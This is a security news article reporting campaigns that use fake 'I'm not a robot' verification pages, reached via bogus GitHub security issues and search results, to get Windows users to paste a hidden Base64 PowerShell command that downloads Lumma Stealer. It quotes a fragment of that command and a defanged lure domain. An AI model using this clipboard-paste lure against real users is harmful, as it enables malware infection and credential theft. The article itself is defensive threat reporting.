Windows users targeted with fake human verification pages delivering malware
For a while now, security researchers have been warning about fake human verification pages tricking Windows users into inadvertently installing malware. A recently exposed campaign showed how some users end up on these pages.
Beware of fake human verification pages
In late August 2024, Palo Alto Networks’ Unit 42 spotted seven CAPTCHA-style human verification pages that were not what they seemed.
“These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware,” Unti 42 threat hunter Paul Michaud II explained.
The infection process (Source: PAN Unit 42)
More recently, CloudSEC researchers have identified more active pages hosted on various providers and using content delivery networks, still spreading the Lumma Stealer.
“[The] PowerShell script is copied on the clipboard via the Clicking on the ‘I’m not a robot’ button,” they clarified.
“Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC.”
Once decoded, the command fetches the content from a text file hosted on the remote server, which contains additional commands to download the Lumma Stealer and executes them.
“If the downloaded file (dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains,” they concluded, and noted that the malware delivered via this page can be easily changed.
How are targeted users directed to these pages?
Security researcher Ax Sharma has recently been tipped off about email alerts from legitimate GitHub servers that point to fake human verification pages.
After digging into the matter, he discovered that malware peddlers have been opening “issues” on open source repositories on GitHub and claiming that the project contains a “security vulnerability”.
This action triggered the sending of email alerts with the same content to contributors to and subscribers of these repositories.
The email alerts come from GitHub servers and are signed by the GitHub Security Team, and point to the github-scanner[.]com domain, which does not belong nor is used by GitHub. A fake human verification page is waiting there to deliver a trojan to potential victims.
Users should be aware of these ploys and should expect to encounter more campaigns with other “lures”. The same PowerShell-script-copying-and-running trick has previously been used in a ClearFake campaign documented by Proofpoint researchers.
UPDATE (September 23, 2024, 02:30 p.m. ET):
Secureworks incident responders have spotted the same trick getting used for targeting users searching for video streaming services via Google.
“The attack exploits a clever combination of social engineering and circumvention of browser security controls. It’s a new attack vector and presents a significant risk for organisations that don’t restrict what employees can run on their systems. Employees might be using corporate systems to browse for seemly harmless content, but in this case, they are being tricked into actively executing malicious code,” said Rafe Pilling, Director of Threat Intelligence, Secureworks Counter Threat Unit.
“Cybercriminals are constantly evolving their tactics. In these cases, we’ve seen the stolen credentials harvested by the infostealers available on marketplaces very quickly. It’s crucial that organizations are actively educating teams on evolving techniques and up to date threat intelligence, as well as putting in place policies that mitigate risk.”